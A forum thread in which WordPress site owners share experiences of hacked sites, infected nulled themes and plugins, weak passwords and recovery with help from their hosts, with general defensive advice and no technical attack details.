    If you a getting hacked/nulled/shared themes and plugins - and you are not 100% sure of the it, the source and are unable to verify it's safe - DON'T DO IT!! - go get a free theme/plugin or buy the one you need.

    Yes, there has been issues with TimThumb exploit, I've not come across it myself

    Yes, Site owners are still dumb and use weak/stupid password choices - go get a decent password, it takes moments and can save your site and content, your partner/pet/family-member will not be offended that you're not using them ot their birthday as a password!!

    I do come across infected themes and plugins a number of times a week!!.

    Cheers,
    .
    {{ DiscussionBoard.errors[6594686].message }}
  • Profile picture of the author oniram
    I am very glad I found this thread before I loaded my new WP site with plugins. I have always wondered how secure they are. Thanks every one for sharing.
    {{ DiscussionBoard.errors[6603648].message }}
  • Profile picture of the author EddieWade
    Banned
    I think it was a similar thread these days on the topic.
    I have never experienced this situation so far with WP, but what I read here is quite scary.
    I will keep my eyes open and my plugins set!
    {{ DiscussionBoard.errors[6604862].message }}
  • Profile picture of the author roxitsc
    This happened to me to a few years ago, I had around 3 site hacked. I was lucky that the guys from my hosting helped me out.
    {{ DiscussionBoard.errors[6604919].message }}
  • Profile picture of the author DWaters
    Yes this is a very serious situation and should not be over looked. I had my WP site injected with malicious script eariler this year. I had some sites on Goole page one and they were all sent to kingdom come once this happened. I am only now starting to recover. WeWatchYourSite.com was some help, but their customer service response seems slow... maybe they are too busy ???

    I am only now recovering.
    Signature
    How I really Make Money With Amazon

    Want to get rich with top rated FREE Super Affiliate Training?
    {{ DiscussionBoard.errors[6604932].message }}
    • Profile picture of the author DWolfe
      I was hit three weeks ago, contacted my web-designer and he explained what it was but could not fix it.

      I have hostgator hosting these sites. I gave hostgator a call within 24 hours all were up and running. They also sent an email how to get these sites re-listed with google since they contained Malware. Once that was done I changed all my passwords and have been fine since.
      Signature


      You can earn 10% average annual returns on your investments - https://app.groundfloor.us/r/m2aa7b
      {{ DiscussionBoard.errors[6605013].message }}
  • Profile picture of the author Schnitzel
    Yes, i had like 2 of my sites hacked (on the same server). Other servers were not affected. I already used Login Lockdown and Antivirus and/or wp-firewall.
    Have now switched to a more advanced (paid) solution and have been hacker-free ever since.

    Also: if your host has been hacked it doesn't matter if you can restore your site because due to some (php) files on your server they can get in again and again and again until it's properly cleaned. But you got to ask an expert which i am not. Just want to point out that security for websites is a topic which is not to be taken lightly and just because your sites seem to be fine again doesn't mean they are.
    Signature

    meh

    {{ DiscussionBoard.errors[6607320].message }}

Trending Topics